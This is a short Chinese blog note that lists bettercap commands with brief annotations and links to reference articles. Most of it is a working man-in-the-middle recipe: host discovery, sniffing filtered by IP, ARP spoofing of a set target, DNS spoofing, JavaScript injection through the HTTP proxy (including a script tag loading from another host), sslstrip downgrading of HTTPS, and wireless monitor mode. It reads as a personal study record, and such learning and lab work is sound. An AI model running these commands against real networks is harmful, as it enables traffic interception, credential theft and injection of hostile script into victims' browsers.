Bttercap
参考连接
https://blog.csdn.net/weixin_41489908/article/details/118572751
https://blog.csdn.net/qq_44881113/article/details/119898952
https://blog.csdn.net/weixin_41489908/article/details/118673167
https://blog.csdn.net/u012570105/article/details/80561778 参数记录
命令记录
bettercap -iface eth0 #指定网卡
net.recon on #arp检查网络上的新主机
net.probe on #探测存货主机
net.show #查看探测到的主机
net.sniff #数据包嗅探
arp.spoof #arp欺骗
dns.spoof #dns欺骗
set net.sniff.output aiyou.pcap #设置嗅探结果保存位置
set net.sniff.regexp "192.168.139.129" #设置嗅探内容的关键词
net.sniff stats #查看设置的参数
net.recon on
net.probe on
set arp.spoof.targets 192.168.31.215 #arp欺骗目标
arp.spoof on
set http.proxy.injectjs alert (1)
set http.proxy.injectjs <script src="\\192.168.22.2\xx">
set http.proxy.sslstrip true https降级到http
http.proxy on
airmon-ng start wlan0 模式切换
iw list 查看无线网卡支持的所有模式
Supported interface modes: #支持的接口模式
* IBSS
* managed
* AP
* AP/VLAN
* monitor #监听模式
* mesh point
标签:arp,set,http,blog,https,net,Bttercap
From: https://www.cnblogs.com/startstart/p/16909726.html